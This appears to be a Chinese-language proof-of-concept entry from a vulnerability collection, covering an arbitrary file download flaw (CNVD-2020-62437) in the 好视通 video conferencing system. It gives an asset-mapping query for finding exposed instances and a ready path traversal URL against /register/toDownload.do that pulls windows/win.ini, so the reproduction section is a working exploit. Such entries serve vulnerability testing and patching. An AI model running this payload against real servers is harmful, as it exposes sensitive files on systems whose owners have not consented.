Awesome-POC/Web应用漏洞/银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437.md
2024-11-06 14:10:36 +08:00

43 lines
604 B
Markdown

# 银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437
## 漏洞描述
银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感信息
## 漏洞影响
```
银澎云计算 好视通视频会议系统
```
## 网络测绘
```
app="Hanming-Video-Conferencing"
```
## 漏洞复现
登录页面如下
![](images/202202101930170.png)
漏洞Url为
```plain
https://xxx.xxx.xxx.xxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
```
![](images/202202101930402.png)
##